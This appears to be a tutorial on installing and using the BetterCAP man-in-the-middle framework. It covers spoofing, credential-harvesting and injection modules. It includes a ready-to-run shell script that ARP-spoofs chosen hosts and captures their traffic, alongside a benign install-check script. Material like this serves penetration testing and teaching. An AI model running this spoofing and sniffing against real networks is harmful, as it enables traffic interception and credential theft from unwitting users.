Powerful, Modular, Portable MITM Attack Framework
BetterCAP is a powerful, modular, flexible and portable MITM attack framework created to perform various types of attacks against a network. It can manipulate HTTP, HTTPS and TCP traffic in real time, sniff for credentials, and more. It was completely reimplemented in 2018, and besides MITM it now brings network monitoring, 802.11 and BLE attacks and more. Penetration testers, reverse engineers and cybersecurity researchers may find this tool very useful.
The second generation of BetterCAP is a complete re-implementation of what was already the most complete and advanced Man-in-the-Middle attack framework, and it raises MITM attacks to a whole new level. BetterCAP also aims to become a reference framework for network monitoring, 802.11 and BLE attacks, and more.
Bettercap switched from a Ruby application to a compiled Go application, which allows BetterCAP 2.7.0 to run on low-end hardware while proxying hundreds of connections per second and forwarding thousands of packets. Memory and CPU usage are now heavily optimized, so you can run several instances of your favorite MITM attack framework side by side. BetterCAP supports Windows, macOS, Android, Linux (arm, mips, mips64, etc.) and iOS.
Features:
- Full and half duplex ARP spoofing
- ICMP/DNS/NDP spoofing
- Modular HTTP and HTTPS transparent proxies with support for user plugins
- Realtime credentials harvesting for protocols such as HTTP(S) POSTed data, Basic and Digest authentication, FTP, IRC, POP, IMAP, SMTP and NTLM (HTTP, SMB, LDAP, etc.)
- Fully customizable sniffer
- Modular HTTP/HTTPS proxies that allow injection of custom HTML, JS, CSS code or URLs
- SSL stripping with HSTS bypass, and more
New Features:
- The HTTPS certificate / certificate authority fields can now be customized via dedicated module parameters (http.server, https.proxy and api.rest)
- implemented any.proxy module to redirect traffic to custom proxy tools
- implemented http.proxy.injectjs and https.proxy.injectjs parameters to inject JavaScript code, files or URLs without a proxy module
Bettercap Caplets
Bettercap caplets, or .cap files, are a powerful way to script bettercap's interactive sessions; think of them as the equivalent of Metasploit's .rc resource files. Check this repository for available caplets and modules. To execute one:
$ sudo bettercap -caplet ./example.cap
BetterCap vs. EtterCAP
- EtterCAP worked well, but it is a very old tool and unstable on big networks
- Unlike BetterCAP's, EtterCAP filters are very hard to implement (they need their own specific filter language)
- EtterCAP doesn't provide builtin HTTP(S) and TCP transparent proxies, nor a fully customizable credentials sniffer, etc.
Install BetterCAP
First, you need to make sure that you have a correctly configured Go >= 1.8 environment, with $GOPATH/bin in your $PATH. You also need the libpcap-dev and libnetfilter-queue-dev packages on your system. Install them if missing:
$ sudo apt-get install libpcap-dev libnetfilter-queue-dev
Then download BetterCAP as follows:
$ go get github.com/bettercap/bettercap
This command downloads bettercap, installs its dependencies, compiles it and places the bettercap executable in $GOPATH/bin.
If you want to update to the latest (unstable) code from the repository, run:
$ go get -u github.com/bettercap/bettercap
Note that these are GOPATH-mode commands for the Go toolchain of the time: since Go 1.17 installing binaries with go get is deprecated, so on a current toolchain follow the project's current build instructions instead.
Use sudo bettercap -h to show the basic command line options.
$ bettercap --help
Usage of ./bettercap:
  -autostart string
        Comma separated list of modules to auto start. (default "events.stream, net.recon")
  -caplet string
        Read commands from this file and execute them in the interactive session.
  -cpu-profile file
        Write cpu profile file.
  -debug
        Print debug messages.
  -env-file string
        Load environment variables from this file if found, set to empty to disable environment persistence.
  -eval string
        Run one or more commands separated by ; in the interactive session, used to set variables via command line.
  -iface string
        Network interface to bind to, if empty the default interface will be auto selected.
  -mem-profile file
        Write memory profile to file.
  -no-colors
        Disable output color effects.
  -no-history
        Disable interactive session history file.
  -silent
        Suppress all logs which are not errors.
For legacy options check here.
Note: You might encounter an error like "error while loading shared libraries: libpcap.so.1: cannot open shared object file: No such file or directory". The recommended workaround is to link the installed libpcap library under the name the loader is looking for (substitute the libpcap version actually present on your system for 1.8.1):
$ sudo ln -s /usr/lib/x86_64-linux-gnu/libpcap.so.1.8.1 /usr/lib/libpcap.so.1
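The install steps above and the libpcap note amount to a short checklist; the script below is an added example (not code from the original page or from the bettercap project) that runs that checklist before you build. It assumes a Debian-style system for the dpkg check and a handful of usual library directories for locating libpcap; the helper names (go_version_ok, path_has_dir, find_libpcap, preflight) are this script's own. The pure helpers can be exercised on their own; only preflight touches the machine.

```shell
#!/usr/bin/env bash
# Added example, not part of the bettercap project or the original post.
# Pre-flight checks for building bettercap 2.x from source: Go >= 1.8,
# $GOPATH/bin on $PATH, the libpcap/libnetfilter-queue dev packages, and the
# libpcap.so.1 runtime link the note above is about.
set -u

# go_version_ok "<output of go version>" [MIN]
# Parses "goMAJOR.MINOR[.PATCH]" out of the string and compares MAJOR.MINOR
# numerically against MIN (default 1.8). A devel build without a number fails.
go_version_ok() {
    local verstr=$1 want=${2:-1.8} have
    have=$(printf '%s\n' "$verstr" | sed -n 's/.*go\([0-9][0-9]*\.[0-9][0-9]*\).*/\1/p')
    [ -n "$have" ] || return 1
    local hmaj=${have%%.*} hmin=${have#*.} wmaj=${want%%.*} wmin=${want#*.}
    [ "$hmaj" -gt "$wmaj" ] && return 0
    [ "$hmaj" -eq "$wmaj" ] && [ "$hmin" -ge "$wmin" ]
}

# path_has_dir "<colon-separated PATH>" "<dir>": exact component match, so
# /home/u/go is not mistaken for /home/u/go/bin.
path_has_dir() {
    case ":$1:" in *":$2:"*) return 0 ;; esac
    return 1
}

# find_libpcap DIR...: print the newest libpcap.so.1.x.y found in the given
# directories (empty output if none). Needs GNU sort for version ordering.
find_libpcap() {
    local dir f
    for dir in "$@"; do
        for f in "$dir"/libpcap.so.1.*; do
            [ -e "$f" ] && printf '%s\n' "$f"
        done
    done | sort -V | tail -n 1
}

# preflight: run all checks against this machine; exit status 0 when the
# prerequisites from the install section are satisfied.
preflight() {
    local rc=0 gobin pkg lib
    if command -v go >/dev/null 2>&1 && go_version_ok "$(go version)"; then
        echo "ok   $(go version)"
    else
        echo "FAIL Go >= 1.8 not found (bettercap 2.x is a Go program)"; rc=1
    fi
    gobin="${GOPATH:-$HOME/go}/bin"
    if path_has_dir "$PATH" "$gobin"; then
        echo "ok   $gobin is in PATH"
    else
        echo "FAIL $gobin is not in PATH; go get installs bettercap there"; rc=1
    fi
    if command -v dpkg >/dev/null 2>&1; then          # Debian/Ubuntu only
        for pkg in libpcap-dev libnetfilter-queue-dev; do
            if dpkg -s "$pkg" >/dev/null 2>&1; then
                echo "ok   $pkg installed"
            else
                echo "FAIL $pkg missing: sudo apt-get install $pkg"; rc=1
            fi
        done
    fi
    # The dynamic loader finds libpcap.so.1 through the ldconfig cache; the
    # /usr/lib symlink from the note is only needed when it is not there, and
    # the version suffix must be whatever is actually installed.
    if ldconfig -p 2>/dev/null | grep -q 'libpcap\.so\.1 '; then
        echo "ok   libpcap.so.1 known to the dynamic loader"
    else
        lib=$(find_libpcap /usr/lib/x86_64-linux-gnu /usr/lib64 /usr/lib /usr/local/lib)
        if [ -n "$lib" ]; then
            echo "FAIL libpcap.so.1 not in ldconfig cache; try: sudo ln -s $lib /usr/lib/libpcap.so.1"
        else
            echo "FAIL no libpcap.so.1.* found; install libpcap first"
        fi
        rc=1
    fi
    return $rc
}

case "${1:-}" in --run) preflight ;; esac   # ./preflight.sh --run
```

Run it with --run before the go get step; each FAIL line names the fix. The libpcap check deliberately asks the loader (ldconfig -p) rather than testing for the /usr/lib path, because on most distributions the library lives under a multiarch directory and the symlink from the note is the exception, not the rule.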
Basic commands:
help MODULE          : List available commands or show module specific help if no module name is provided.
active               : Show information about active modules.
quit                 : Close the session and exit.
sleep SECONDS        : Sleep for the given amount of seconds.
get NAME             : Get the value of variable NAME, use * alone for all, or NAME* as a wildcard.
set NAME VALUE       : Set the VALUE of variable NAME.
read VARIABLE PROMPT : Show a PROMPT to ask the user for input that will be saved inside VARIABLE.
clear                : Clear the screen.
include CAPLET       : Load and run this caplet in the current session.
! COMMAND            : Execute a shell command and print its output.
alias MAC NAME       : Assign an alias to a given endpoint given its MAC address.
Basic info & Commands
» net.show
+----------------+--------------------+-----------------+---------------------------+---------+---------+------------+
| IP             | MAC                | Name            | Vendor                    | Sent    | Recvd   | Last Seen  |
+----------------+--------------------+-----------------+---------------------------+---------+---------+------------+
| 192.168.xx.xx  | a0:4e:xx:xx:xx:xx  | eth0            |                           | 0 B     | 0 B     | 15:12:48   |
| 192.168.xx.xx  | ac:28:xx:xx:xx:xx  | gateway         |                           | 197 kB  | 0 B     | 15:12:49   |
|                |                    |                 |                           |         |         |            |
| 192.168.xx.xx  | a8:20:xx:xx:xx:xx  | 192.168.xx.xx   | xx.                       | 29 MB   | 18 MB   | 19:29:11   |
| 192.168.xx.xx  | a0:37:xx:xx:xx:xx  | unknown.        | xx.                       | 1.4 MB  | 383 kB  | 19:27:50   |
| 192.168.xx.xx  | a0:49:xx:xx:xx:xx  | workgroup.      | xx.                       | 290 kB  | 9.5 kB  | 19:28:43   |
| 192.168.xx.xx  | a4:56:xx:xx:xx:xx  | 192.168.xx.xx   |                           | 4.6 kB  | 0 B     | 19:28:14   |
| 192.168.xx.xx  | a8:72:xx:xx:xx:xx  | 192.168.xx.xx   | xx.                       | 626 kB  | 0 B     | 19:28:23   |
| 192.168.xx.xx  | a8:62:xx:xx:xx:xx  | 192.168.xx.xx   | xx.                       | 69 kB   | 11 kB   | 19:28:29   |
| 192.168.xx.xx  | ac:18:xx:xx:xx:xx  | 192.168.xx.xx   | xx.                       | 0 B     | 0 B     | 15:12:49   |
| 192.168.xx.xx  | a4:2c:xx:xx:xx:xx  | 192.168.xx.xx   | xx.                       | 4.1 kB  | 0 B     | 18:39:24   |
| 192.168.xx.xx  | a8:37:xx:xx:xx:xx  | 192.168.xx.xx   |                           | 9.5 kB  | 6.9 kB  | 19:05:36   |
| 192.168.xx.xx  | a0:42:xx:xx:xx:xx  | 192.168.xx.xx   | xx.                       | 0 B     | 0 B     | 15:12:49   |
| 192.168.xx.xx  | a0:33:xx:xx:xx:xx  | 192.168.xx.xx   | xx.                       | 133 kB  | 0 B     | 19:28:22   |
+----------------+--------------------+-----------------+---------------------------+---------+---------+------------+
*xx - redacted info
Use help to see which module is running:
» help

Modules

any.proxy     > not running (firewall redirection to any custom proxy)
api.rest      > not running (Expose a RESTful API)
arp.spoof     > running     (Keep spoofing selected hosts on the network)
ble.recon     > not running (Bluetooth Low Energy devices discovery)
dhcp6.spoof   > running     (Replies to DHCPv6 messages, providing victims with a link-local IPv6 address and setting the attacker's host as default DNS server)
dns.spoof     > running     (Replies to DNS messages with spoofed responses)
events.stream > running     (Print events as a continuous stream)
gps           > not running (talking with GPS hardware on a serial interface)
http.proxy    > not running (full featured HTTP proxy that can be used to inject malicious contents into webpages, all HTTP traffic will be redirected to it)
http.server   > not running (simple HTTP server, to be used to serve files and scripts across the network)
https.proxy   > not running (full featured HTTPS proxy that can be used to inject malicious contents into webpages, all HTTPS traffic will be redirected to it)
mac.changer   > not running (change active interface mac address)
mysql.server  > not running (simple Rogue MySQL server, to be used to exploit LOCAL INFILE and read arbitrary files from the client)
net.probe     > running     (actively search for hosts by sending UDP packets to every IP in the subnet)
net.recon     > not running (read ARP cache in order to monitor hosts on the network)
net.sniff     > not running (Sniff packets from the network)
packet.proxy  > not running (Linux only module that relies on NFQUEUEs to filter packets)
syn.scan      > not running (perform a SYN port scan against an IP address within the provided ports range)
tcp.proxy     > not running (full featured TCP proxy and tunnel, all TCP traffic to a given remote address and port will be redirected to it)
ticker        > not running (execute one or more commands every given amount of time)
update        > not running (check bettercap updates)
wifi          > not running (monitor and perform wireless attacks on 802.11)
wol           > not running (send Wake On Lan packets in broadcast or to specific MAC)
For specific module, run:
» help <module>
To get all info on all modules:
» get *
any.proxy.dst_address: '<interface address>'
any.proxy.dst_port: '8080'
any.proxy.iface: '<interface name>'
....
wifi.hop.period: '250'
wifi.skip-broken: 'true'
wifi.source.file: ''
To get all info on specific module:
» get dns.spoof.*
dns.spoof.address: '<interface address>'
dns.spoof.all: 'false'
dns.spoof.domains: '*'
If you want to run commands right away (from the terminal), pass them to -eval separated by semicolons:
$ bettercap -eval "net.probe on; ticker on"
To run system commands within bettercap, prefix them with !:
» !pwd
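The caplet section above and the -eval and set/get commands describe the same thing from two angles: a list of bettercap commands that either lives in a .cap file or is joined with semicolons on the command line. The script below is an added example (not code from the original page or from the bettercap project) that builds a caplet for a targeted ARP spoof plus packet capture, validates the target list first so a typo cannot silently widen the attack, converts the caplet into the equivalent -eval string, and launches bettercap with it when run with --run. The module parameters used (arp.spoof.targets, arp.spoof.fullduplex, net.sniff.output, net.sniff.filter, net.sniff.verbose) are bettercap's own; the helper names and the default caplet path are this script's assumptions.

```shell
#!/usr/bin/env bash
# Added example, not part of the bettercap project or the original post.
# Generates a caplet that ARP-spoofs a list of targets and records their
# traffic to a pcap file, and shows the same commands as a -eval string.
set -u

# Accept only a dotted-quad IPv4 address. bettercap itself also takes CIDRs,
# ranges and MACs in arp.spoof.targets; this helper deliberately stays strict.
is_ipv4() {
    local ip=$1 octet n=0 oldifs=$IFS
    case $ip in ''|*[!0-9.]*|.*|*.|*..*) return 1 ;; esac
    IFS=.
    for octet in $ip; do
        n=$((n + 1))
        [ "$octet" -le 255 ] || { IFS=$oldifs; return 1; }
    done
    IFS=$oldifs
    [ "$n" -eq 4 ]
}

# Validate a comma-separated target list one address at a time; empty
# entries (",,") and a trailing comma are rejected.
validate_targets() {
    local rest=$1 t
    [ -n "$rest" ] || return 1
    while [ -n "$rest" ]; do
        t=${rest%%,*}
        if [ "$t" = "$rest" ]; then
            rest=''
        else
            rest=${rest#*,}
            [ -n "$rest" ] || return 1
        fi
        is_ipv4 "$t" || return 1
    done
}

# build_caplet TARGETS PCAP: print the caplet to stdout. "not arp" keeps the
# spoofing traffic bettercap generates itself out of the capture.
build_caplet() {
    local targets=$1 out=$2
    validate_targets "$targets" || { echo "build_caplet: bad target list '$targets'" >&2; return 1; }
    cat <<EOF
# generated by build_caplet: ARP spoof selected hosts and record their traffic
set arp.spoof.targets $targets
set arp.spoof.fullduplex true
set net.sniff.verbose false
set net.sniff.output $out
set net.sniff.filter not arp
net.recon on
arp.spoof on
net.sniff on
EOF
}

# caplet_to_eval: read a caplet on stdin and print the equivalent -eval
# argument, dropping comment and blank lines and joining the rest with ';'.
caplet_to_eval() {
    grep -Ev '^[[:space:]]*(#|$)' | paste -s -d ';' -
}

# run_caplet IFACE TARGETS PCAP [CAPLET]: write the caplet and start bettercap.
run_caplet() {
    local iface=$1 targets=$2 out=$3 capfile=${4:-./arp-sniff.cap}
    build_caplet "$targets" "$out" > "$capfile" || return 1
    echo "caplet written to $capfile; equivalent -eval string:" >&2
    caplet_to_eval < "$capfile" >&2
    sudo bettercap -iface "$iface" -caplet "$capfile"
}

case "${1:-}" in
    --run)
        [ $# -ge 4 ] || { echo "usage: $0 --run IFACE TARGETS PCAP [CAPLET]" >&2; exit 2; }
        run_caplet "$2" "$3" "$4" "${5:-./arp-sniff.cap}" ;;   # e.g. --run eth0 192.168.1.10,192.168.1.11 /tmp/targets.pcap
esac
```

The interface is not set inside the caplet because it is a command-line option (-iface), not a module parameter; everything else is ordinary set and module-on commands, which is why the same file can be handed to -caplet or flattened into -eval.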
Conclusion
Things to work on:
- Experiment with the different options, the HTTPS and proxy modules in particular
Bettercap is a versatile tool. Redirection, phishing, sniffing, injection... you can do a lot with it. But there are some "problems": behaviour can vary with the network architecture, DNS caching and your setup, and unexpected results can happen, especially for inexperienced users. It is going to take you some time to overcome these problems and get used to the new environment. All in all, it is a solid tool that you should at least try. Check some examples on: